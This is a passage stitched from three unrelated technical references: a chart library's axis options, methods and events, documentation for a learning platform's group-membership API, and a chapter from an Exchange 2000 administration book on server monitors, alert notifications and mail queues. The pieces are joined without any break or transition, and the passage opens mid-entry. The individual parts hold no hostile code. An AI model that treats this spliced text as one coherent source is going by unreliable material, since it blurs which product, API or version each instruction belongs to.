The color can be any HTML color string, for example: 'red' or '#00cc00'. Also see fontName and fontSize. Type: object. Default: {color: 'black', fontName: <global-font-name>, fontSize: <global-font-size>}.

vAxis.ticks
Replaces the automatically generated Y-axis ticks with the specified array. Each element of the array should be either a valid tick value (such as a number, date, datetime, or timeofday), or an object. If it's an object, it should have a v property for the tick value, and an optional f property containing the literal string to be displayed as the label. Examples:
• vAxis: { ticks: [5,10,15,20] }
• vAxis: { ticks: [{v:32, f:'thirty two'}, {v:64, f:'sixty four'}] }
• vAxis: { ticks: [new Date(2014,3,15), new Date(2013,5,15)] }
• vAxis: { ticks: [16, {v:32, f:'thirty two'}, {v:64, f:'sixty four'}, 128] }
Type: Array of elements. Default: auto.

vAxis.title
vAxis property that specifies a title for the vertical axis. Type: string. Default: no title.

vAxis.titleTextStyle
An object that specifies the vertical axis title text style. The object has this format:
{ color: <string>, fontName: <string>, fontSize: <number>, bold: <boolean>, italic: <boolean> }
The color can be any HTML color string, for example: 'red' or '#00cc00'. Also see fontName and fontSize. Type: object. Default: {color: 'black', fontName: <global-font-name>, fontSize: <global-font-size>}.

vAxis.maxValue
Moves the max value of the vertical axis to the specified value; this will be upward in most charts. Ignored if this is set to a value smaller than the maximum y-value of the data. vAxis.viewWindow.max overrides this property. Type: number. Default: automatic.

vAxis.minValue
Moves the min value of the vertical axis to the specified value; this will be downward in most charts. Ignored if this is set to a value greater than the minimum y-value of the data. vAxis.viewWindow.min overrides this property. Type: number. Default: null.
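For example, custom ticks and explicit axis bounds might be combined as in the following sketch; the tick values and the 'Losses' title are illustrative only.

var options = {
  vAxis: {
    title: 'Losses',
    ticks: [0, {v: 16, f: 'sixteen'}, 32, 64],  // mixed plain and labeled ticks
    minValue: 0,    // overridden by vAxis.viewWindow.min if both are set
    maxValue: 64    // overridden by vAxis.viewWindow.max if both are set
  }
};
chart.draw(data, options);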
vAxis.viewWindowMode
Specifies how to scale the vertical axis to render the values within the chart area. The following string values are supported:
• 'pretty' - Scale the vertical values so that the maximum and minimum data values are rendered a bit inside the top and bottom of the chart area. This will cause vAxis.viewWindow.min and vAxis.viewWindow.max to be ignored.
• 'maximized' - Scale the vertical values so that the maximum and minimum data values touch the top and bottom of the chart area. This will cause vAxis.viewWindow.min and vAxis.viewWindow.max to be ignored.
• 'explicit' - A deprecated option for specifying the top and bottom scale values of the chart area. (Deprecated because it's redundant with vAxis.viewWindow.min and vAxis.viewWindow.max.) Data values outside these values will be cropped. You must specify a vAxis.viewWindow object describing the maximum and minimum values to show.
Type: string. Default: equivalent to 'pretty', but vAxis.viewWindow.min and vAxis.viewWindow.max take precedence if used.

vAxis.viewWindow
Specifies the cropping range of the vertical axis. Type: object. Default: null.

vAxis.viewWindow.max
The maximum vertical data value to render. Ignored when vAxis.viewWindowMode is 'pretty' or 'maximized'. Type: number. Default: auto.

vAxis.viewWindow.min
The minimum vertical data value to render. Ignored when vAxis.viewWindowMode is 'pretty' or 'maximized'. Type: number. Default: auto.

width
Width of the chart, in pixels. Type: number. Default: width of the containing element.

Methods

draw(data, options)
Draws the chart. The chart accepts further method calls only after the ready event is fired. Extended description. Return Type: none.

getAction(actionID)
Returns the tooltip action object with the requested actionID. Return Type: object.

getBoundingBox(id)
Returns an object containing the left, top, width, and height of chart element id. The format for id isn't yet documented (they're the return values of event handlers), but here are some examples:
var cli = chart.getChartLayoutInterface();
Height of the chart area: cli.getBoundingBox('chartarea').height
Width of the third bar in the first series of a bar or column chart: cli.getBoundingBox('bar#0#2').width
Bounding box of the fifth wedge of a pie chart: cli.getBoundingBox('slice#4')
Bounding box of the chart data of a vertical (e.g., column) chart: cli.getBoundingBox('vAxis#0#gridline')
Bounding box of the chart data of a horizontal (e.g., bar) chart: cli.getBoundingBox('hAxis#0#gridline')
Values are relative to the container of the chart. Call this after the chart is drawn. Return Type: object.

getChartAreaBoundingBox()
Returns an object containing the left, top, width, and height of the chart content (i.e., excluding labels and legend):
var cli = chart.getChartLayoutInterface();
cli.getChartAreaBoundingBox().left
cli.getChartAreaBoundingBox().top
cli.getChartAreaBoundingBox().height
cli.getChartAreaBoundingBox().width
Values are relative to the container of the chart. Call this after the chart is drawn. Return Type: object.

getChartLayoutInterface()
Returns an object containing information about the onscreen placement of the chart and its elements. The following methods can be called on the returned object:
• getBoundingBox
• getChartAreaBoundingBox
• getHAxisValue
• getVAxisValue
• getXLocation
• getYLocation
Call this after the chart is drawn. Return Type: object.
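A short usage sketch of the layout interface, assuming a chart that has already been drawn:

var cli = chart.getChartLayoutInterface();

// Dimensions of the chart content, excluding labels and legend.
var area = cli.getChartAreaBoundingBox();
console.log(area.left, area.top, area.width, area.height);

// Width of the third bar in the first series of a bar or column chart.
console.log(cli.getBoundingBox('bar#0#2').width);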
getHAxisValue(position, optional_axis_index)
Returns the logical horizontal value at position, which is an offset from the chart container's left edge. Can be negative. Example: chart.getChartLayoutInterface().getHAxisValue(400). Call this after the chart is drawn. Return Type: number.

getImageURI()
Returns the chart serialized as an image URI. Call this after the chart is drawn. See Printing PNG Charts. Return Type: string.

getSelection()
Returns an array of the selected chart entities. Selectable entities are points, annotations, legend entries and categories. A point or annotation corresponds to a cell in the data table, a legend entry to a column (row index is null), and a category to a row (column index is null). For this chart, only one entity can be selected at any given moment. Extended description. Return Type: Array of selection elements.

getVAxisValue(position, optional_axis_index)
Returns the logical vertical value at position, which is an offset from the chart container's top edge. Can be negative. Example: chart.getChartLayoutInterface().getVAxisValue(300). Call this after the chart is drawn. Return Type: number.

getXLocation(position, optional_axis_index)
Returns the screen x-coordinate of position relative to the chart's container. Example: chart.getChartLayoutInterface().getXLocation(400). Call this after the chart is drawn. Return Type: number.

getYLocation(position, optional_axis_index)
Returns the screen y-coordinate of position relative to the chart's container. Example: chart.getChartLayoutInterface().getYLocation(300). Call this after the chart is drawn. Return Type: number.

removeAction(actionID)
Removes the tooltip action with the requested actionID from the chart. Return Type: none.

setAction(action)
Sets a tooltip action to be executed when the user clicks on the action text. The setAction method takes an object as its action parameter. This object should specify 3 properties: id (the ID of the action being set), text (the text that should appear in the tooltip for the action), and action (the function that should be run when a user clicks on the action text). Any and all tooltip actions should be set prior to calling the chart's draw() method. Extended description. Return Type: none.

setSelection()
Selects the specified chart entities. Cancels any previous selection. Selectable entities are points, annotations, legend entries and categories. A point or annotation corresponds to a cell in the data table, a legend entry to a column (row index is null), and a category to a row (column index is null). For this chart, only one entity can be selected at a time. Extended description. Return Type: none.

clearChart()
Clears the chart, and releases all of its allocated resources. Return Type: none.

Events
For more information on how to use these events, see Basic Interactivity, Handling Events, and Firing Events.

animationfinish
Fired when transition animation is complete. Properties: none.

click
Fired when the user clicks inside the chart. Can be used to identify when the title, data elements, legend entries, axes, gridlines, or labels are clicked. Properties: targetID.

error
Fired when an error occurs when attempting to render the chart. Properties: id, message.

onmouseover
Fired when the user mouses over a visual entity. Passes back the row and column indices of the corresponding data table element. Properties: row, column.

onmouseout
Fired when the user mouses away from a visual entity. Passes back the row and column indices of the corresponding data table element. Properties: row, column.
ready
The chart is ready for external method calls. If you want to interact with the chart, and call methods after you draw it, you should set up a listener for this event before you call the draw method, and call them only after the event has fired. Properties: none.

select
Fired when the user clicks a visual entity. To learn what has been selected, call getSelection(). Properties: none.

Data Policy
All code and data are processed and rendered in the browser. No data is sent to any server.
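To close out this reference, here is a hedged sketch of the pattern recommended above (register listeners before calling draw); the ColumnChart type and the 'chart_div' container id are assumptions.

var chart = new google.visualization.ColumnChart(
    document.getElementById('chart_div'));

// Register listeners before draw(), as the ready event documentation advises.
google.visualization.events.addListener(chart, 'ready', function () {
  // Safe to call methods now, e.g., serialize the chart as a PNG data URI.
  console.log(chart.getImageURI());
});
google.visualization.events.addListener(chart, 'select', function () {
  console.log(chart.getSelection());  // inspect what the user selected
});

chart.draw(data, options);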
What This API Endpoint Does
With the Group Memberships API you can add users to and remove users from a group. Admins see this reflected on the People tab under either the individual user or group record. Any courses assigned to the group will appear in the user's library. You can also use this API to retrieve a list of a group's members or the groups in which an individual user is enrolled.

Endpoints
• GET /groups/{groupId}/users - list a group's members
• GET /users/{userId}/groups - list a user's groups
• PUT /groups/{groupId}/users/{userId} - add a user to a group
• DELETE /groups/{groupId}/users/{userId} - remove a user from a group

Note: You can't use the PUT or DELETE endpoints to manage groups provisioned by SCIM.

List a Group's Members
GET /groups/{groupId}/users
Request Parameters (Query String)
• limit (integer, optional) - the maximum number of results to return in a single response (see Pagination); must be between 1 and 100 (defaults to 50)

Example response:

{
  "users": [
    {
      "id": "example-user-id-1",
      "email": "[email protected]",
      "groupsUrl": "https://api.rise.com/users/example-user-id-1/groups",
      "role": "learner",
      "firstName": "Example First Name 1",
      "lastName": "Example Last Name 1",
      "lastActiveAt": "2021-10-28T20:39:52.659Z",
      "learnerReportUrl": "https://api.rise.com/reports/learners/example-user-id-1",
      "url": "https://api.rise.com/users/example-user-id-1"
    },
    ...
  ],
  "nextUrl": "https://url-for-next-page-of-results"
}

Endpoint-specific error codes:
• group_not_found - cannot list users because group does not exist

List a User's Groups
GET /users/{userId}/groups
Request Parameters (Query String)
• limit (integer, optional) - the maximum number of results to return in a single response (see Pagination); must be between 1 and 100 (defaults to 50)

Example response:

{
  "groups": [
    {
      "id": "example-group-id-1",
      "isManagedByIdentityProvider": false,
      "membersUrl": "https://api.rise.com/groups/example-group-id/users",
      "name": "Example Group",
      "url": "https://api.rise.com/groups/example-group-id-1"
    },
    ...
  ],
  "nextUrl": "https://url-for-next-page-of-results"
}

Endpoint-specific error codes:
• user_not_found - cannot list user's groups because user does not exist

Add User to Group
PUT /groups/{groupId}/users/{userId}
Success response: 204 "No Content"
Endpoint-specific error codes:
• group_not_found - cannot add user to group because group does not exist
• user_not_found - cannot add user to group because user does not exist

Remove User from Group
DELETE /groups/{groupId}/users/{userId}
Success response: 204 "No Content"
Endpoint-specific error codes:
• group_not_found - cannot remove user from group because group does not exist
• user_not_found - cannot remove user from group because user does not exist
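As a minimal JavaScript sketch of these endpoints, the fetch-based helpers below list a group's members (following nextUrl pagination) and add a user to a group. The bearer-token Authorization header is an assumption; this excerpt does not document the authentication scheme.

const BASE = 'https://api.rise.com';

// List all members of a group, following nextUrl pagination.
async function listGroupMembers(groupId, apiKey) {
  let url = `${BASE}/groups/${groupId}/users?limit=100`;
  const users = [];
  while (url) {
    const res = await fetch(url, {
      headers: { Authorization: `Bearer ${apiKey}` }  // assumed auth scheme
    });
    if (!res.ok) throw new Error(`Request failed: ${res.status}`);
    const body = await res.json();
    users.push(...body.users);
    url = body.nextUrl || null;  // null when there are no more pages
  }
  return users;
}

// Add a user to a group; a successful response is 204 with no body.
async function addUserToGroup(groupId, userId, apiKey) {
  const res = await fetch(`${BASE}/groups/${groupId}/users/${userId}`, {
    method: 'PUT',
    headers: { Authorization: `Bearer ${apiKey}` }  // assumed auth scheme
  });
  if (res.status !== 204) throw new Error(`Request failed: ${res.status}`);
}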
Monitoring Connections, Services, Servers, and Resource Usage
Updated: September 4, 2001
From Chapter 15, Microsoft Exchange 2000 Administrator's Pocket Consultant by William R. Stanek.

As an Exchange administrator, you should routinely monitor connections, services, servers, and resource usage. These elements are the key to ensuring that the Exchange organization is running smoothly. Because you can't be on-site 24 hours a day, you can set alerts to notify you when problems occur.

On This Page
Checking Server and Connector Status
Working with Queues
Managing Queues

Checking Server and Connector Status
The Tools node in System Manager has a special area that you can use to track the status of Exchange servers and connectors. To access this area, follow these steps:
1. Start System Manager.
2. Expand Tools, and then expand Monitoring And Status.
3. Select Status in the console tree.
In the right pane, you should now see the status of each Exchange server and connector configured for use in the organization. The status is listed as either
• Available - The server or connector is available for use.
• Unreachable - The server or connector isn't available and a problem may exist.
In the Name column you may also see icons that give further indication of the status of a given server or connector:
• A red circle with an X indicates that a critical monitor has exceeded its threshold value or the connector/server is unreachable.
• A yellow triangle with an exclamation point indicates that a warning monitor you've set for a server has exceeded its threshold value.
Tip: To get the latest status on servers and connectors, right-click the Status node in the console tree, and then select Refresh. This refreshes the view, ensuring that you have the latest information. You'll learn more about configuring server monitors in the following section, "Monitoring Server Performance and Services."

Monitoring Server Performance and Services
Exchange 2000 monitors provide a fully automated method for monitoring server performance and tracking the status of key services. You can use Exchange 2000 monitors to track
• Virtual memory usage
• CPU utilization
• Free disk space
• SMTP and X.400 queues
• Windows 2000 service status
Using notifications, you can then provide automatic notification when a server exceeds a threshold value or when a key service stops.
Note: Windows 2000 Performance Monitors are an alternative to Exchange 2000 monitors. You use these monitors in the Windows 2000 Performance Monitor utility as discussed in Chapter 3 of Microsoft Windows 2000 Administrator's Pocket Consultant (Microsoft Press, 2000).

Setting Virtual Memory Usage Monitors
Virtual memory is critically important to normal system operation. When a server runs low on virtual memory, system performance can suffer and message processing can grind to a halt. To counter this problem, you should set monitors to watch virtual memory usage. Then you can increase the amount of virtual memory available on the server or add additional RAM as needed. You configure a virtual memory monitor by completing the following steps:
1. Start System Manager. If administrative groups are enabled, expand the administrative group in which the server you want to use is located.
2. Expand Servers.
Right-click the server you want to work with, and then select Properties.
3. In the Monitoring tab, click Add. In the Add Resource dialog box, select Available Virtual Memory, and then click OK. As shown in Figure 15-7, you'll see the Virtual Memory Thresholds dialog box.
Figure 15-7. Use the Virtual Memory Thresholds dialog box to set warning thresholds for virtual memory usage.
4. In the Duration (Minutes) field, type the number of minutes that the available virtual memory must be below a threshold to change the state. Normally, you'll want to set a value of 5 to 10 minutes.
5. To set a warning state threshold, select Warning State (Percent), and then select the smallest percentage of virtual memory your server can operate on before issuing a warning state alert. In most cases you'll want to issue warnings when less than 10 percent of virtual memory is available for an extended period of time.
6. To set a critical state threshold, select Critical State (Percent), and then select the smallest percentage of virtual memory your server can operate on before issuing a critical state alert. In most cases you'll want to issue critical alerts when less than 5 percent of virtual memory is available for an extended period of time. Note: If you also set a warning state threshold, the warning value must be larger than the critical value.
7. Click OK. For automated notification, you must configure administrator notification.

Setting CPU Utilization Monitors
You can use a CPU utilization monitor to track the usage of a server's CPUs. When CPU utilization is too high, Exchange Server can't effectively process messages or manage other critical functions. As a result, performance can suffer greatly. CPU utilization at 100 percent for an extended period of time can be an indicator of serious problems on a server. Typically, you'll need to reboot a server when the CPU utilization is stuck at maximum utilization (100 percent). You configure a CPU monitor by completing the following steps:
1. Start System Manager. If administrative groups are enabled, expand the administrative group in which the server you want to use is located.
2. Expand Servers. Right-click the server you want to work with, and then select Properties.
3. In the Monitoring tab, click Add. In the Add Resource dialog box, select CPU Utilization, and then click OK. As shown in Figure 15-8, you'll see the CPU Utilization Thresholds dialog box.
Figure 15-8. Use the CPU Utilization Thresholds dialog box to set warning thresholds for CPU usage.
4. In Duration (Minutes), type the number of minutes that CPU usage must exceed a threshold to change the state. Normally, you'll want to set a value of 5 to 10 minutes.
5. To set a warning state threshold, select Warning State (Percent), and then select the maximum allowable CPU utilization before issuing a warning state alert. In most cases you'll want to issue warnings when CPU usage is 95 percent or greater for an extended period.
6. To set a critical state threshold, select Critical State (Percent), and then select the maximum allowable CPU utilization before issuing a critical state alert. In most cases you'll want to issue critical alerts when CPU usage is at 100 percent for an extended period. Note: If you also set a warning state threshold, the critical value must be larger than the warning value.
7. Click OK. For automated notification, you must configure administrator notification.

Setting Free Disk Space Monitors
Exchange Server uses disk space for data storage, logging, tracking, and virtual memory.
When hard disks run out of space, the Exchange server malfunctions and data can be lost. To prevent serious problems, you should monitor free disk space closely on all drives used by Exchange Server. You configure a disk monitor by completing the following steps:
1. Start System Manager. If administrative groups are enabled, expand the administrative group in which the server you want to use is located.
2. Expand Servers. Right-click the server you want to work with, and then select Properties.
3. In the Monitoring tab, click Add. In the Add Resource dialog box, select Free Disk Space, and then click OK. As shown in Figure 15-9, you'll see the Disk Space Thresholds dialog box.
Figure 15-9. Use the Disk Space Thresholds dialog box to set the thresholds that monitor the available disk space on key drives.
4. Use the Drive To Be Monitored selection list to choose a drive you want to monitor, such as C:.
5. To set a warning state threshold, select Warning State (MB), and then select the smallest disk space (in MB) the server can operate on before issuing a warning state alert. Typically, you'll want Exchange Server to issue a warning when a drive has less than 100 MB of disk space.
6. To set a critical state threshold, select Critical State (MB), and then select the smallest disk space (in MB) your server can operate on before issuing a critical state alert. Typically, you'll want Exchange Server to issue a critical alert when a drive has less than 25 MB of disk space. Note: If you also set a warning state threshold, the critical value must be smaller than the warning value.
7. Click OK. Repeat this procedure for all the drives that Exchange Server uses except M:. For automated notification, you must configure administrator notification.

Setting SMTP and X.400 Queue Monitors
If a messaging queue grows continuously, it means that messages aren't leaving the queue and aren't being delivered as fast as new messages arrive. This can be an indicator of network or system problems that may need your attention. You configure a queue monitor by completing the following steps:
1. Start System Manager. If administrative groups are enabled, expand the administrative group in which the server you want to use is located.
2. Expand Servers. Right-click the server you want to work with, and then select Properties.
3. In the Monitoring tab, click Add. To set an SMTP queue monitor, select SMTP Queue Growth, and then click OK. To set an X.400 queue monitor, select X.400 Queue Growth, and then click OK.
4. To set a warning state threshold, select Warning State, and then type the number of minutes that the queue can grow continuously before issuing a warning state alert. A queue that's growing continuously for more than 10 minutes is usually a good indicator of a potential problem.
5. To set a critical state threshold, select Critical State, and then type the number of minutes that the queue can grow continuously before issuing a critical state alert. In most cases a queue that's growing continuously for more than 30 minutes indicates a serious problem with the network or the server. Note: If you also set a warning state threshold, the critical duration must be longer than the warning duration.
6. Click OK. For automated notification, you must configure administrator notification.

Setting Windows 2000 Service Monitors
Exchange 2000 monitors can track the status of Windows 2000 services as well. Then if a service you've configured for monitoring is stopped, Exchange Server generates a warning or critical alert.
When you install an Exchange server, certain critical services are configured for monitoring automatically. These services are displayed in the Monitoring tab under the heading Default Microsoft Exchange Services, and they're generally the following services:
• Microsoft Exchange Information Store
• Microsoft Exchange MTA Stacks
• Microsoft Exchange Routing Engine
• Microsoft Exchange System Attendant
• Simple Mail Transport Protocol (SMTP)
• World Wide Web Publishing Service
When you configure service monitors, you can add them to the Default Microsoft Exchange Services heading. Or you can create your own heading for additional services. The key reason for grouping services under a common heading is to ease the administrative burden. Instead of having to configure separate entries for each service, you create a single entry, add services to it, and then set the alert type for all the services in the group. You configure service monitors by completing the following steps:
1. Start System Manager. If administrative groups are enabled, expand the administrative group in which the server you want to use is located.
2. Expand Servers. Right-click the server you want to work with, and then select Properties.
3. In the Monitoring tab, click Add. In the Add Resource dialog box, select Windows 2000 Service, and then click OK. As shown in Figure 15-10, you'll see the Services dialog box.
4. Type a name for the group of services for which you're configuring the monitor.
5. Click Add. Select a service to add to the monitor, and then click OK. Repeat as necessary.
6. When any of the selected services stops running, an alert is issued. This can be either a Warning alert or a Critical alert, depending on the value you select in the When Service Is Not Running Change State To field.
7. Click OK. For automated notification, you must configure administrator notification as described in the section of this chapter entitled "Configuring Notifications."
Figure 15-10. In the Services dialog box, type a name for the group of services you want to monitor. Then after adding the services, set the type of alert as either Warning or Critical.

Removing Monitors
If you don't want to use a particular monitor anymore, you can remove it by completing the following steps:
1. Start System Manager. If administrative groups are enabled, expand the administrative group in which the server you want to use is located.
2. Expand Servers. Right-click the server you want to work with, and then select Properties.
3. Click the Monitoring tab. You should now see a list of all monitors configured on the server.
4. Select the monitor you want to delete, and then click Remove.
5. Click OK.

Disabling Monitoring
When you're troubleshooting Exchange problems or performing maintenance, you may want to temporarily disable monitoring and in this way stop Exchange Server from generating alerts. To disable monitoring, complete the following steps:
1. Start System Manager. If administrative groups are enabled, expand the administrative group in which the server you want to use is located.
2. Expand Servers. Right-click the server you want to work with, and then select Properties.
3. Click the Monitoring tab. You should now see a list of all monitors configured on the server.
4. Select Disable All Monitoring Of This Server, and then click OK.
Caution: When you're finished testing or troubleshooting, you should repeat this procedure and clear the Disable All Monitoring Of This Server check box.
If you forget to do this, administrators won't be notified when problems occur.

Configuring Notifications
One of the key reasons to configure monitoring is to notify administrators when problems occur. You can configure two types of notification:
• E-Mail - Used to send e-mail to administrators when a server or connector enters a warning or critical state
• Script - Used to have Exchange Server execute a script when a server or connector enters a warning or critical state
The sections that follow explain how you can create and manage notifications.
Note: Useful resources for creating scripts are Windows NT Scripting Administrator's Guide and Windows 2000 Scripting Bible (IDG Books Worldwide, 2000).

Notifying by E-Mail
You use e-mail notification to send e-mail to administrators when a server or connector enters a warning or critical state. You can select multiple recipients to be notified and you can select a specific server to use in generating the e-mail. To configure e-mail notification, follow these steps:
1. Start System Manager.
2. Expand Tools, and then expand Monitoring And Status.
3. Right-click the Notification folder, point to New, and then click E-Mail Notification. This displays the Properties dialog box shown in Figure 15-11.
4. To specify the server that will monitor and notify users by e-mail, click Select, and then choose a server.
Figure 15-11. Use the Properties dialog box to configure e-mail notification.
5. Use the Servers And Connectors To Monitor list box to choose the servers or connectors you want administrators to be notified about. The available options are
• This Server
• All Servers
• Any Server In The Routing Group
• All Connectors
• Any Connector In The Routing Group
• Custom List Of Servers
• Custom List Of Connectors
Note: To create a custom list of servers or connectors, select Custom List Of Servers or Custom List Of Connectors, and then click Customize. Afterward, in the Custom List window, click Add, and then choose a server or connector to add to the custom list.
6. You can configure notification for either Warning alerts or Critical state alerts. Use Notify When Monitored Items Are In to choose the state that triggers notification.
7. Click To, and then select a recipient to notify. You can notify multiple users by selecting an appropriate mail-enabled group.
8. Click Cc, and then select additional recipients to notify. Again, you can notify multiple users by selecting an appropriate mail-enabled group.
9. Click E-Mail Server, and then choose the e-mail server that should generate the e-mail message.
10. Use the Subject field to set a subject for the notification message. The default subject line specifies the type of alert that occurred and the item on which the alert occurred. These values are represented by the subject line %TargetInstance.ServerStateString% on %TargetInstance.Name%.
11. The message box at the bottom of the window sets the body of the message. In most cases you'll want to edit the default message body.
The default text tells administrators the following information:
• %TargetInstance.Name% is the name of the server or connector that triggered the notification
• %TargetInstance.ServerStateString% is the type of alert
• %TargetInstance.QueuesStateString% is the reported status of queues
• %TargetInstance.DisksStateString% is the reported status of drives
• %TargetInstance.ServicesStateString% is the reported status of services
• %TargetInstance.MemoryStateString% is the reported status of virtual memory
• %TargetInstance.CPUStateString% is the reported status of CPUs
12. Click OK. Repeat this procedure to configure notification for other servers and connectors.

Using Script Notification
You use script notification to have Exchange Server execute a script when a server or connector enters a warning or critical state. The script can execute commands that restart processes, clear up disk space, or perform other actions needed to resolve a problem on the Exchange server. The script could also generate an e-mail through an alternate gateway, which is useful if the Exchange server is unable to deliver e-mail. To configure script notification, follow these steps:
1. Start System Manager.
2. Expand Tools, and then expand Monitoring And Status.
3. Right-click the Notification folder, point to New, and then click Script Notification. This displays the Properties dialog box shown in Figure 15-12.
4. To specify the server that will monitor the selected items and run the script, click Select, and then choose a server.
Figure 15-12. Use the Properties dialog box to configure script notification.
5. Use the Servers And Connectors To Monitor list box to choose the servers or connectors you want administrators to be notified about. The available options are
• This Server
• All Servers
• Any Server In The Routing Group
• All Connectors
• Any Connector In The Routing Group
• Custom List Of Servers
• Custom List Of Connectors
Note: To create a custom list of servers or connectors, select Custom List Of Servers or Custom List Of Connectors, and then click Customize. Afterward, in the Custom List window, click Add, and then choose a server or connector to add to the custom list.
6. You can configure notification for either Warning alerts or Critical state alerts. Use Notify When Monitored Items Are In to choose the state that triggers notification.
7. In Path To Executable, type the complete file path to the script you want to execute, such as C:\scripts\mynotificationscript.vbs. You can run any type of executable file, including batch scripts with the .bat or .cmd extension and Windows scripts with the .vbs, .js, .pl, or .wsc extension.
Note: The Exchange System Attendant must have permission to execute this script, so be sure to grant access to the local system account or any other account that you've configured to run this service.
8. To pass arguments to a script or application, type the options in the Command Line Options field.
9. Click OK. A minimal example of such a notification script follows.
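Since the steps above note that Windows scripts with a .js extension are accepted, here is a minimal JScript sketch of a notification script. The log file path is an assumption, and any command-line options configured in step 8 arrive through WScript.Arguments; a production script would do real remediation work instead of just logging.

// notify.js - minimal JScript notification script (runs under Windows Script Host).
var fso = new ActiveXObject("Scripting.FileSystemObject");
var log = fso.OpenTextFile("C:\\scripts\\exchange-alerts.log", 8, true); // 8 = ForAppending

// Collect any arguments passed via the Command Line Options field.
var args = WScript.Arguments;
var detail = "";
for (var i = 0; i < args.length; i++) {
  detail += " " + args(i);
}

log.WriteLine(new Date() + " Exchange monitor alert:" + detail);
log.Close();

// A real script might restart a stopped service or send mail through an
// alternate gateway, as described above.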
Viewing and Editing Current Notifications
You can view all notifications configured in the organization with the Notification entry in System Manager. Start System Manager, expand Tools, expand Monitoring And Status, and then select Notifications. Each notification is displayed with summary information depicting the following:
• Name of the monitoring server
• Items monitored
• Action performed
• State that triggers notification
To edit a notification, double-click it, and then modify the settings as necessary. When you're finished, click OK. To delete a notification, right-click it, and then select Delete. When prompted to confirm the action, click Yes.

Working with Queues
As an Exchange administrator, it's your responsibility to monitor Exchange queues regularly. Exchange Server uses queues to hold messages while they're being processed for routing and delivery. If messages remain in a queue for an extended period, there may be a problem. For example, if an Exchange server is unable to connect to the network, you'll find that messages aren't being cleared out of queues. Exchange Server supports two types of queues:
• System queues - The default queues in the organization. There are three providers for system queues: SMTP, Microsoft MTA (X.400), and MAPI (Messaging Application Programming Interface).
• Link queues - Created by Exchange Server when there are multiple messages bound for the same destination. These queues are accessible only when they have messages waiting to be routed.

Using SMTP Queues
Each SMTP virtual server has several system queues associated with it. These queues are
• Local Delivery - Contains messages that are queued for local delivery, that is, messages that the Exchange server is waiting to deliver to a local Exchange mailbox.
• Messages Awaiting Directory Lookup - Contains messages to recipients who have not yet been resolved in Active Directory.
• Messages Waiting To Be Routed - Contains messages waiting to be routed to a destination server. Messages move from here to a link queue.
• Final Destination Currently Unreachable - Contains messages that can't be routed because the destination server is unreachable.
• Pre-Submission - Contains messages that have been acknowledged and accepted by the SMTP service but haven't been processed yet.
As you can see, SMTP queues are used to hold messages in various stages of routing. You access these queues through the SMTP virtual server node by completing the following steps:
1. Start System Manager. If administrative groups are enabled, expand the administrative group in which the server you want to use is located.
2. Navigate to the Protocols container in the console tree. Expand Servers, expand the server you want to work with, and then expand Protocols.
3. Navigate to a virtual server's Queues node. Expand SMTP, expand the virtual server you want to work with, and then expand Queues.
4. Select the queue you want to work with.

Using Microsoft MTA (X.400) Queues
The Microsoft Message Transfer Agent (MTA) provides addressing and routing information for sending messages from one server to another. The MTA relies on X.400 transfer stacks to provide additional details for message transfer, and these stacks are similar in purpose to the Exchange virtual servers used with SMTP. The key queue used with the Microsoft MTA is the PendingRerouteQ. This queue contains messages that are waiting to be rerouted after a temporary link outage. To access the PendingRerouteQ, follow these steps:
1. Start System Manager. If administrative groups are enabled, expand the administrative group in which the server you want to use is located.
2. Navigate to the Protocols container in the console tree. Expand Servers, expand the server you want to work with, and then expand Protocols.
3. Expand X.400, and then expand Queues. Finally, select PendingRerouteQ.

Using MAPI Queues
Novell GroupWise, Lotus Notes, and Lotus cc:Mail connectors all use MAPI queues. MAPI queues are used to route and deliver messages over the related connector.
The queues you may see are
• MTS-In - Contains messages that have come to the Exchange organization over the connector. The message contents and addresses haven't been converted to Exchange format.
• Ready-In - Contains messages that have been converted to Exchange format and are ready to be delivered. Recipient addresses still need to be resolved.
• Ready-Out - Contains messages that have been prepared for delivery to a foreign system. The message addresses have been resolved, but the message contents haven't been converted.
• Badmail - Contains all messages that caused errors when the connector tried to process them. No further delivery attempts are made on these messages and they are stored in this queue until you delete them manually.
To access a MAPI queue, follow these steps:
1. Start System Manager. If administrative groups are enabled, expand the administrative group you want to work with.
2. If available, expand Routing Groups, and then expand the routing group that contains the connector you want to work with.
3. Navigate to the connector's Queues node. Expand Connectors, expand the connector, and then expand Queues.
4. Select the queue you want to work with.

Managing Queues
You usually won't see messages in queues because they're processed and routed quickly. Messages come into a queue, Exchange Server performs a lookup or establishes a connection, and then Exchange Server either moves the message to a new queue or delivers it to its destination. Messages remain in a queue when there's a problem. To check for problem messages, you must enumerate messages in the queue. Messages aren't enumerated by default; you must do this manually.

Enumerating Messages in Queues
In order to manage queues, you must enumerate messages. This process allows you to examine queue contents and perform management tasks on messages within a particular queue. The easiest way to enumerate messages is to do so in sets of 100. To display the first 100 messages in a queue, follow these steps:
1. Start System Manager, and then navigate to the queue you want to work with.
2. Right-click the queue, and then select Enumerate 100 Messages.
Repeat this process if you want to access the next 100 messages. Or to refresh the current list of messages, right-click the queue, and then select Re-enumerate.
Note: You can only re-enumerate a queue that you've managed previously. If you haven't enumerated a queue previously, the Details pane will display the following message: Enumerate messages from the queue node. Additionally, if there are no messages in the queue, the Details pane will display the following message: There are no matching messages queued.
You can also use a custom filter to enumerate messages. To create a custom filter and then set the filter as the default, follow these steps:
1. Start System Manager, and then navigate to the queue you want to work with.
2. Right-click the queue, and then select Custom Filter.
3. From the Action selection list, select Enumerate.
4. To select a specific number of messages, choose Select Only The, and then specify the Number Of Messages to enumerate.
5. To select messages by other criteria, choose Select Messages That Are, and then set the enumeration criteria.
6. To select all available messages, choose Select All Messages.
7. Optionally, you can save your changes as the default filter by selecting Set As Default Filter.
8. When you click OK, the custom filter is automatically executed.
Understanding Queue Summaries and Queue States
Whenever you click a Queues node in System Manager, you get a summary of the currently available queues for the selected node. These queues can include both system and link queues, depending on the state of the Exchange server. Although queue summaries provide important details for troubleshooting message flow problems, you do have to know what to look for. The connection state is the key information to look at first. This value tells you the state of the queue. States you'll see include
• Active - An active queue is needed to allow messages to be transported out of a link queue.
• Ready - A ready queue is needed to allow messages to be transported out of a system queue. When link queues are ready, they can have a connection allocated to them.
• Retry - A connection attempt has failed and the server is waiting to retry.
• Scheduled - The server is waiting for a scheduled connection time.
• Remote - The server is waiting for a remote dequeue command (TURN/ETRN).
• Frozen - The queue is frozen, and none of its messages can be processed for routing. Messages can enter the queue, however, as long as the Exchange routing categorizer is running. You must unfreeze the queue to resume normal queue operations.
